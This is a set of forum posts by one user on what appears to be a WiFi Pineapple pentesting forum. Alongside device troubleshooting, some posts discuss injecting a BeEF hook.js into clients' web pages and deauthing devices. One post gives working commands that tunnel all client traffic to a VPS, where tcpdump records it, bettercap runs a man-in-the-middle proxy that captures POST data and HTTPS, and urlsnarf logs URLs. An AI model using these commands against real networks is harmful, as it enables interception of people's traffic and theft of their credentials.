Jump to content

BeNe

Active Members
  • Posts

    184
  • Joined

  • Last visited

  • Days Won

    6

Posts posted by BeNe

  1. On 31.12.2016 at 6:29 AM, b0N3z said:

    I have been using a pi zero with a usb2eth0 and wifi connection to run bettercap and xerosploit on a network to replace downloads and well use bettercap

     

    Have a Pi Zero W here and want to create excatly the same in combination with the Pineapple Nano. The Nano has not enough CPU/RAM so i want to use bettercap on the Pi Zero W. Still searching for the best way to connect it to the pineapple (WiFi, usb2eth to pineapple or usb2eth to rpi). The nano is so unstable that i only use it to collect the clients.

    Some hint for this Project ?

  2. I´m still looking for a smart way to inject the hook.js in every http website!

    I tried some options on my Nethunter device (since there is no tool on the Nano itsself) with "mitmf" but it doesn´t work at all. Because the networf interface for the mobile options "rmnet0" doesn´t have a MAC-Address.So an arp spoof won´t work.I tested the dns spoof, but the client connects to the pineapple and the dns server is the pineapple itself no dns requests are spoofed behind the pineapple on the nethunter device. I tested also the responder module on the nano with a small modification for the HTMLtoInject part...but it was also not useable.

    Last ideas:

    Change the DHCP Server on the pineapple -> set the nethunter device as dns-server to fire up mitmf with dns spoof and inject the hook.js this way.

    Does anybody know where i can find the old MKv Modules (beef helpfer and mitm) to check how they worked ?

    Thanks!

  3. Quote

    The only possible downside, it may get caught at customs and have extra on it for delivery, or it may not. It's the only real issue.

    Yes, but this is THAT real issue! I have to pay much more delivery and dont forget the tax :wacko:

    So the Europe-Shop is the best place to shop for us europe people. But until there are no new and more Products are availiable i cant use the service.

    Hopefully Rkiver will find a solution

  4. Hello,

    i use the Nano in combination with my Nexus Nethunter device which is running beef on it. So i´m searching the best way to inject the hook.js. I tested the Pineapple´s Landingpage (because this is the perfect place for such a script) but it breaks the normal web surfing since only the landingpage is coming up and nothing else if i enable the landinpage. Is this normal ? If so, is there a way to add a redirect to the original url the client requested after the hook ?

    There was a module for the MarkV ("beef helper" and later the MiTM Module) but only for the old Fimrware Version.

    How do you inject the Beef´s hook.js on the pineapple ?

    Thanks for any hint´s :smile:

     

     

  5. Quote

     I have no such problem with my MK5 which I have used for 2 years so is there a problem with the Nano!!!!! we are not being told about??

    There is no general problem with the Nano and installing modules. Mine works just fine 1.0.6 as many other.

    Quote

    I have tried to install Deauth, Dwall, Occupineapple, SSLstrip and nmap, none of them install dependencies

    Please install them via ssh on your shell to debug the problem. For the Deauth Module for example run this file:

    /pineapple/modules/Deauth/scripts/dependencies.sh

    or do it manuall with

    opkg update && opkg install mdk3 --dest sd

     

  6. I don´t mean the Host is - i mean the target itself.

    Quote

    In addition, my Pineapple frequently becomes unresponsive, and requires a reboot. Is this a known issue for firmware 1.0.6?

    No, it´s not. Mine is stable. Maybe you are running to much modules the same time. Please check your process and cpu load on shell with "top" for example.

  7. Sorry dermitname, but this a commuity forum so you can´t expect immediate help. We are not a 24/7 first level support :rolleyes: It´s also our all freetime here!

    To your problem:

    Try to format the SD-Card in the pineapple. Go to your pineapple webinterface ->  Advanced, press the arrow down beside "USB" and choose Format SD Card.  Then test it again. On the otherside, is the SD-Card still ok and healthy ? The SD-Card works well in any other device ?

    Try to copy some files on the shell to your card. Maybe you will see there some more infos. What kind of card do you use ?

  8. Installed kmod-usb-net without any luck

    root@Nano:~# opkg list kmod-usb-net
    kmod-usb-net - 3.18.23-1
    If the above errors were only about a kernel version missmatch, please ignore them. The package was installed successfully.
    root@Nano:~#

    no new eth interface:

    root@Nano:~# ifconfig -a eth0
    eth0      Link encap:Ethernet  HWaddr 00:C0:CA:90:XX:XX
              UP BROADCAST MULTICAST  MTU:1500  Metric:1
              RX packets:0 errors:0 dropped:0 overruns:0 frame:0
              TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
              collisions:0 txqueuelen:1000
              RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
              Interrupt:4
    
    root@Nano:~# ifconfig -a eth1
    ifconfig: eth1: error fetching interface information: Device not found

    here is the dmesg output:

    [  413.510000] usb 1-1.3.1: USB disconnect, device number 6
    [  416.070000] usb 1-1.3.2: new high-speed USB device number 9 using ehci-platform

    However, thanks for your help and ideas @Foxtrot

  9. Not every device works the same way. There is a big differenc in manufactor, model and OS.
    I never was able to deauth a Windows PC >8.1 for example which is no problem with Windows XP or an Android device.

    Under Windows 10 you will only see a small part of all broadcast SSID´s, but under Windows 7 you see the complete list. So on device will connect to your pineapple and the other won´t. Some security software warn or prevent if you want to connect to an unencrypted wifi like ESET under Windows and Android.

    Just try it with another device.

  10. I spent some time again with the Nano and my VPN Server since Darren & Snubs talked about VPN in the last Hak5 Sessions. 

    The idea behind is nothing new and i´m sure many Pineapple-User out there done it already this way (more or less). I talk about a Server to "power-Up" the Pineapple, something like a "WiFi-Pineapple Server". In simple words - route the complete Pineapple Traffic (that also includes the traffic from the wifi clients), to a powerfull VPN Server and attack/change/record it there.

    The Pineapple is mobile and perfect to broadcast SSID´s, deauth clients and catch them - but none pineapple is powerfull enough to play Man-in-the-Middle, save the whole traffic fast enough without any storage limit or generate Certificates fast enought on the fly....

    mxz2wc86.png

    So the plan is simple:

    • Install a Kali Linux inside a VPS (or take a Debian template and add the Kali repository)
    • Install a VPN Server on it (You can use a simple script for that part --> https://github.com/Nyr/openvpn-install which is explained in the Hak5 Epsiode 2202)
    • Copy the OpenVPN Config to the Nano (/root/nano.ovpn in my case)  and install openvpn (for some more info please check also the Hak5 Episode 2202)
    opkg update && opkg install openvpn-openssl
    • Route all traffic to the VPN Sever
      • (Add the following lines to the /etc/rc.local file:)
    openvpn /root/nano.ovpn &
    iptables -t nat -A POSTROUTING -s 172.16.42.0/24 -o tun0 -j MASQUERADE
    iptables -A FORWARD -s 172.16.42.0/24 -o tun0 -j ACCEPT 
    iptables -A FORWARD -d 172.16.42.0/24 -m state --state ESTABLISHED,RELATED -i tun0 -j ACCEPT

    Now the complete traffic goes throught the VPN Tunnel to the Sever where we can catch it on tun0 :ph34r:

    Some examples:

    Record the complete traffic to a pcap and show the out directly on shell:

    tcpdump -i tun0 -w - | tee /root/tcpdump/dump-$(date +%F_%R).pcap | tcpdump -r -


    Start a MiTM Attack with bettercap:

    bettercap -L --no-discovery -O /root/bettercap/bettercap.log -X -P '*' --proxy -P POST --proxy-https --allow-local-connections

    I added the "--no-discovery" option since it make no sense on a hosted VPS.
    If you want to use the http & https proxy, you need to redirect the ports on the VPS:

    iptables -t nat -A PREROUTING -i tun0 -p tcp --dport 443 -j DNAT --to-destination 11.22.33.44:8083
    iptables -t nat -A PREROUTING -i tun0 -p tcp --dport 80 -j DNAT --to-destination 11.22.33.44:8080

    Change 11.22.33.44 to your external Server IP-Address.

    FireUp URLSnarf:

    urlsnarf -i tun0


    Good to know:
    As we use OpenVPN with a tun device the interface comes without a MAC-Adress. So not every piece of software will run.
    A workaround is maybe to use a tap device (bridge) instead of a tun (routed). It is more overhead traffic but if it works...
    In some cases you could use eth0 from your Server - in some not. Depends on your Hosters config an your tool.

    Some more options:

    You can create a second or third OpenVPN Config for your Lan-Turtle, Smartphone or Laptop.
    If you open the tunnel on your Smartphone or Laptop you will be able to connect via 10.8.0.2 (in my case) to the pineapple via ssh or webinterface.
    It is more or less the same as autossh - but just the easy way. So drop you pineapple everywhere and connect simple via VPN.

    Some simple ideas (brainstorming) for a Pineapple-Server:
     - Backup your pineapple files to the Server (Logs, Files, Modules,...)
     - Sync Broadcast SSID´s from one Pineapple to the other via VPN during a pentest for a higher result.
     - A Tactical Webinterface to connect directly to a dropped pineapple, get status, see conncted devices (like a C&C Center)
     - Pineapple-Stats v2 (was a cool module for the MarkV)
     - Move modules to the Server instead on the pineapple to use the power of the Server (something like Install to Internal / SD-Card / Server)
     - Use any other pentest tool your want, Metasploit on the Server :)

    This works of course with the MarkV, Nano and Tetra.

    As i said - is nothing new to use a VPN Connection, combine it with a pineapple and route it to a Server. But this gives complete new options to every Pineapple user.  Yes, you will need a Server and a know how - but the speed and the options of it - is it worth.

    Have fun - thanks!

  11. I understand, of course thats what the nano is made for. But you will debug it right? So you need to check under what condition it work or not.

    You can also disable the managment AP and connect to any broadcast SSID. The Webinterface is also available as normal Client with or without management ap. Or do you use the USB tethering ?

×
×
  • Create New...